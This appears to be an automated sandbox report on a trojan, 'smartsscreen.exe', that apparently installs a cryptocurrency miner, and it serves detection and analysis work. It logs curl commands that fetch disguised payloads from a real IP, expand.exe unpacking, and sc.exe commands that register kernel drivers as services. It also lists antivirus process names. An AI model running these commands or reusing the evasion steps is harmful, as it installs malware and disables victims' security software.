Source: smartsscreen.exe	Binary or memory string: 100-continue152587890625762939453125AMDisbetter!Accuracy(%d)AuthenticAMDBidi_ControlCONTINUATIONCentaurHaulsCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512EnableWindowExtCreatePenExtractIconWFindNextFileGenuineIntelGenuineTMx86Geode by NSCGetAddrInfoWGetConsoleCPGetCursorPosGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobalUnlockI'm a teapotInstAltMatchJoin_ControlKVMKVMKVMKVMLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMicrosoft HvMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongPdhOpenQueryPeekMessageWPostMessageWReadConsoleWRegGetValueWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeSERIALNUMBERSYN_RECEIVEDSelectObjectSendMessageWSetCursorPosSetEndOfFileSetErrorModeSetRectEmptySetStdHandleSetTextColorSetWindowPosSora_SompengSubtractRectSyloti_NagriSysStringLenThread32NextTransitionalTransmetaCPUTransmitFileUnauthorizedUnlockFileExUpdateWindowVIA VIA VIA VMwareVMwareVariantClearVirtualAllocVirtualQueryX-ImforwardsX-Powered-ByXenVMMXenVMM"guestNice":_MSpanManualabi mismatchacaegmgr.exeackwin32.exeaclntusr.exead-aware.exead-watch.exeadvapi32.dlladvxdwin.exeagentsvr.exealertsvc.exealogserv.exealtmatch -> alupdate.exeamswmagt.exeanynotnl -> aowinagt.exeaplica32.exeappsvc32.exeapvxdwin.exeashavast.exeashchest.exeashenhcd.exeashmaisv.exeashpopwz.exeashquick.exeashsimp2.exeashsimpl.exeashskpcc.exeashskpck.exeashwebsv.exeasupport.exeaswupdsv.exeaswwebsv.exeatro55en.exeatrshost.exeatwsctsk.exeautodown.exeavastsvc.exeavcenter.exeavconfig.exeavconsol.exeavengine.exeavgamsvr.exeavgchsvx.exeavgcsrvx.exeavgfwsrv.exeavgidsui.exeavgntmgr.exeavgregcl.exeavgrssvc.exeavgscanx.exeavgserv9.exeavgsystx.exeavgupdln.exeavgupsvc.exeavgwdsvc.exeavgwizfw.exeavinitnt.exeavkproxy.exeavkwctl9.exeavltmain.exeavnotify.exeavpdos32.exeavpdtagt.exeavserver.exeavshadow.exeavsynmgr.exeavwebgrd.exeavwupd32.exeavwupsrv.exebad g statusbad recoverybargains.exebdsubmit.exebdswitch.exebeikesan.exeblackice.exebootconf.exebootwarn.exebwgo0000.execan't happencapfasem.execas64 failedccevtmgr.execclgview.execcprovsp.execcpxysvc.execcregvfy.execcsetmgr.execcsmagtd.execcsvchst.execcupdate.execfiadmin.execfiaudit.execfinet32.execfpconfg.execfplogvw.execfpsbmit.execfpupdat.exechan receiveclamscan.execlamtray.execlaw95cf.execleaner3.execleaner8.execlose notifyclshield.execmdagent.execmgrdian.execomctl32.dllcomdlg32.dllcontent-typecontext.TODOcpf9x206.execpfnt206.execramtray.execrashrep.execsinject.execsinsm32.execsinsmnt.execsrss_tc.execwntdwmo.execyserver.exed_manage.exedalTLDpSugctdefalert.exedefwatch.exedjsnetcn.exedllcache.exedpfsetup.exedrwadins.exedrwagntd.exedrwagnui.exedrwatson.exedrweb32w.exedrweb386.exedrwebcgp.exedrwebcom.exedrwebmng.exedrwebscd.exedrwebupw.exedrwebwcl.exedrwebwin.exedssagent.exedwebllio.exedwengine.exedwhwizrd.exeecapture.exeecengine.exeehttpsrv.exeemlproui.exeemlproxy.exe
Source: curl.exe, 0000000F.00000002.2016056803.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: curl.exe, 00000005.00000002.1942098171.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: curl.exe, 0000000D.00000002.1984202738.0000000000768000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000002.2138753199.0000000000828000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2194086522.00000000009E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\smartsscreen.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\curl.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_5-55514

Source: C:\Users\user\Desktop\curl.exe

5_2_00430450

Source: C:\Users\user\Desktop\smartsscreen.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00401179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,	5_2_00401179
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044C84C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	5_2_0044C84C
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044C850 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	5_2_0044C850

Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\curl.png C:\Users\user\Desktop\curl.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1716985523 -o C:\Users\user\Desktop\taskhostw.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\taskhostw.png C:\Users\user\Desktop\taskhostw.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/config.json?t=1716985532 -o C:\Users\user\Desktop\config.json --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1716985534 -o C:\Users\user\Desktop\WinRing0x64.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\WinRing0x64.png C:\Users\user\Desktop\WinRing0x64.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\taskhostw.exe C:\Users\user\Desktop\taskhostw.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/kill.png?t=1716985546 -o C:\Windows\Sysnative\drivers\aswArPots.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\aswArPots.png C:\Windows\Sysnative\drivers\aswArPots.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start aswArPots	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/delete.png?t=1716985552 -o C:\Windows\Sysnative\drivers\IObitUnlockers.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\IObitUnlockers.png C:\Windows\Sysnative\drivers\IObitUnlockers.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start IObitUnlockers	Jump to behavior

Source: conhost.exe, 00000014.00000002.4234021496.000002435FDD1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.4234021496.000002435FDD1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.4234021496.000002435FDD1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.4234021496.000002435FDD1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\curl.exe

Code function: 5_2_0044C7A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_0044C7A0

Source: C:\Users\user\Desktop\smartsscreen.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: smartsscreen.exe, 00000000.00000003.1813237129.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.1813173527.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ender\MsMpeng.exe
Source: smartsscreen.exe, 00000000.00000003.1813270703.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.1813322281.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: smartsscreen.exe, 00000000.00000003.1813237129.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.1813270703.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.1813173527.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\smartsscreen.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00415170 setsockopt,WSAIoctl,WSAGetLastError,setsockopt,GetLastError,strlen,htons,bind,getsockname,connect,WSAGetLastError,WSAGetLastError,WSAGetLastError,htons,htons,strchr,htons,atoi,WSAGetLastError,	5_2_00415170
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00434060 bind,WSAGetLastError,	5_2_00434060
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0042B430 strlen,strchr,strncpy,strchr,strtoul,strchr,strtoul,memcpy,htons,bind,WSAGetLastError,strcpy,getsockname,getsockname,WSAGetLastError,WSAGetLastError,strchr,getsockname,listen,WSAGetLastError,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,	5_2_0042B430
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00432889 ldap_err2string,ldap_msgfree,ldap_unbind_s,strchr,strchr,curl_easy_unescape,curl_easy_unescape,strchr,strchr,	5_2_00432889
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0042B8A9 htons,bind,WSAGetLastError,getsockname,	5_2_0042B8A9
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0042BAC9 getsockname,listen,WSAGetLastError,	5_2_0042BAC9
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00431E20 ldap_err2string,ldap_msgfree,ldap_unbind_s,strchr,strchr,strchr,strchr,curl_easy_unescape,curl_easy_unescape,curl_easy_unescape,ldap_set_option,ldap_set_option,ldap_set_option,ldap_simple_bind_s,ldap_simple_bind_s,ldap_err2string,ldap_set_option,ldap_set_option,ldap_init,ldap_search_s,ldap_err2string,ldap_set_option,ldap_simple_bind_s,ldap_first_entry,ldap_get_dn,strlen,ldap_first_attribute,ldap_get_values_len,strlen,ldap_value_free_len,ldap_memfree,ldap_next_attribute,ldap_memfree,ber_free,ldap_next_entry,ldap_value_free_len,ldap_memfree,ldap_memfree,ber_free,strchr,strchr,curl_strequal,curl_strequal,curl_strequal,curl_strequal,curl_strequal,	5_2_00431E20

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Windows Service	1 Windows Service	31 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	5 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
smartsscreen.exe	61%	ReversingLabs	Win32.Trojan.Malgent
smartsscreen.exe	77%	Virustotal		Browse
smartsscreen.exe	100%	Avira	BDS/Redcap.ltgoi
smartsscreen.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	100%	Joe Sandbox ML
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	62%	ReversingLabs	Win64.Trojan.CoinminerX
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	77%	Virustotal		Browse
C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp	5%	ReversingLabs
C:\Users\user\Desktop\78996cc0913e428592859084f14a5a0d$dpx$.tmp\8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp	0%	ReversingLabs
C:\Users\user\Desktop\WinRing0x64.sys (copy)	5%	ReversingLabs
C:\Users\user\Desktop\curl.exe (copy)	0%	ReversingLabs
C:\Users\user\Desktop\taskhostw.exe (copy)	62%	ReversingLabs	Win64.Trojan.CoinminerX
C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp	3%	ReversingLabs
C:\Windows\System32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp	12%	ReversingLabs
C:\Windows\system32\drivers\IObitUnlockers.sys (copy)	12%	ReversingLabs
C:\Windows\system32\drivers\aswArPots.sys (copy)	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://xmrig.com/wizard%s	0%	URL Reputation	safe
http://www.avast.com0/	0%	URL Reputation	safe
https://xmrig.com/wizard	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://111.90.158.40:80/config.json?t=1716985532CNUMBEH	0%	Avira URL Cloud	safe
http://111.90.158.40:80/drives/delete.png?t=1716985552i	0%	Avira URL Cloud	safe
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
http://111.90.158.40/WinRing0x64.png?t=1716985534	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	0%	URL Reputation	safe
http://111.90.158.40:80/taskhostw.png?t=1716985523	0%	Avira URL Cloud	safe
http://curl.haxx.se/libcurl/c/curl_easy_setopt.html	0%	Avira URL Cloud	safe
http://111.90.158.40:80/WinRing0x64.png?t=1716985534	0%	Avira URL Cloud	safe
http://%s:%s/config.txt?t=%dinvalid	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/http-cookies.html#	0%	Avira URL Cloud	safe
http://curl.haxx.se/libcurl/c/curl_easy_setopt.html	0%	Virustotal		Browse
http://111.90.158.40:80/drives/kill.png?t=1716985546RS=v	0%	Avira URL Cloud	safe
https://1.1.1.1/dns-query?name=download.yrnvtklot.com&type=A	0%	Avira URL Cloud	safe
http://111.90.158.40:80/drives/delete.png?t=1716985552	0%	Avira URL Cloud	safe
http://111.90.158.40/config.json?t=1716985532	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/http-cookies.html#	0%	Virustotal		Browse
http://111.90.158.40/drives/delete.png?t=1716985552	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/sslcerts.html	0%	Avira URL Cloud	safe
http://111.90.158.40:80/drives/kill.png?t=1716985546-oC:	0%	Avira URL Cloud	safe
http://111.90.158.40:80/curl.png?t=1716985515	0%	Avira URL Cloud	safe
http://111.90.158.40/taskhostw.png?t=1716985523	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/sslcerts.html	0%	Virustotal		Browse
http://111.90.158.40:80/taskhostw.png?t=1716985523-oC:	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
http://111.90.158.40:80/WinRing0x64.png?t=1716985534-oC:	0%	Avira URL Cloud	safe
http://111.90.158.40:80/config.json?t=1716985532	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/sslcerts.htmlcurl	0%	Avira URL Cloud	safe
http://111.90.158.40:80/config.txt?t=1716985514	0%	Avira URL Cloud	safe
https://1.1.1.1/dns-query?name=download.yrnvtklot.com&type=A	2%	Virustotal		Browse
http://https://-.://%s%s%s/%sall	0%	Avira URL Cloud	safe
http://111.90.158.40/drives/kill.png?t=1716985546	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/http-cookies.html	0%	Virustotal		Browse
http://111.90.158.40:80/drives/kill.png?t=1716985546	0%	Avira URL Cloud	safe
http://111.90.158.40:80/drives/delete.png?t=1716985552-oC:	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/sslcerts.htmlcurl	0%	Virustotal		Browse
http://curl.haxx.se/P	0%	Avira URL Cloud	safe
http://curl.haxx.se/docs/copyright.htmlDVarFileInfo$	0%	Avira URL Cloud	safe
http://hws.exeinvalidjsonrpckav.exekis.exelookup	0%	Avira URL Cloud	safe
http://111.90.158.40:80/taskhostw.png?t=1716985523F_PRO	0%	Avira URL Cloud	safe
http://111.90.158.40:80/config.json?t=1716985532-oC:	0%	Avira URL Cloud	safe
http://curl.haxx.se/P	0%	Virustotal		Browse
http://curl.haxx.se/docs/copyright.htmlDVarFileInfo$	0%	Virustotal		Browse
http://www.avast.com0	0%	Avira URL Cloud	safe
https://%s:%sicssuppnt.exeif-none-matchimage/svg	0%	Avira URL Cloud	safe
https://1.1.1.1/dns-query?name=online.yrnvtklot.com&type=A	0%	Avira URL Cloud	safe
http://111.90.158.40:80/WinRing0x64.png?t=1716985534PRO#o	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://111.90.158.40/WinRing0x64.png?t=1716985534	false	Avira URL Cloud: safe	unknown
https://1.1.1.1/dns-query?name=download.yrnvtklot.com&type=A	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://111.90.158.40/config.json?t=1716985532	false	Avira URL Cloud: safe	unknown
http://111.90.158.40/drives/delete.png?t=1716985552	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/curl.png?t=1716985515	false	Avira URL Cloud: safe	unknown
http://111.90.158.40/taskhostw.png?t=1716985523	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/config.txt?t=1716985514	false	Avira URL Cloud: safe	unknown
http://111.90.158.40/drives/kill.png?t=1716985546	false	Avira URL Cloud: safe	unknown
https://1.1.1.1/dns-query?name=online.yrnvtklot.com&type=A	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://111.90.158.40:80/drives/delete.png?t=1716985552i	curl.exe, 0000001D.00000002.2193308149.0000000000790000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/taskhostw.png?t=1716985523	curl.exe, 00000005.00000002.1942098171.0000000000740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/config.json?t=1716985532CNUMBEH	curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://curl.haxx.se/libcurl/c/curl_easy_setopt.html	8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://111.90.158.40:80/WinRing0x64.png?t=1716985534	curl.exe, 0000000F.00000002.2016056803.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2015885653.0000000000720000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2015939572.0000000000860000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s:%s/config.txt?t=%dinvalid	smartsscreen.exe	false	Avira URL Cloud: safe	unknown
http://curl.haxx.se/docs/http-cookies.html#	curl.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/wizard%s	taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	false	URL Reputation: safe	unknown
http://111.90.158.40:80/drives/kill.png?t=1716985546RS=v	curl.exe, 00000015.00000002.2138912986.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/drives/delete.png?t=1716985552	smartsscreen.exe, 00000000.00000003.3057190604.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.3074979645.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2872213799.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2385285722.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2471710851.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2402364679.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2724820614.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2872434476.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2690602143.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2840500996.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2953224662.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2542878047.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2817294659.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2631824681.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2889144526.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2836160513.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.3066509341.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2912107884.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2413551629.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2335072348.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2695596562.0000000000B89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avast.com0/	expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	false	URL Reputation: safe	unknown
https://xmrig.com/wizard	taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	false	URL Reputation: safe	unknown
http://curl.haxx.se/docs/sslcerts.html	curl.exe, curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://111.90.158.40:80/drives/kill.png?t=1716985546-oC:	curl.exe, 00000015.00000002.2138912986.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/taskhostw.png?t=1716985523-oC:	curl.exe, 00000005.00000002.1942238556.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1942098171.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://curl.haxx.se/docs/http-cookies.html	curl.exe, curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://111.90.158.40:80/WinRing0x64.png?t=1716985534-oC:	curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/config.json?t=1716985532	curl.exe, 0000000D.00000002.1984202738.0000000000760000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1983692782.0000000000130000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://curl.haxx.se/docs/sslcerts.htmlcurl	curl.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
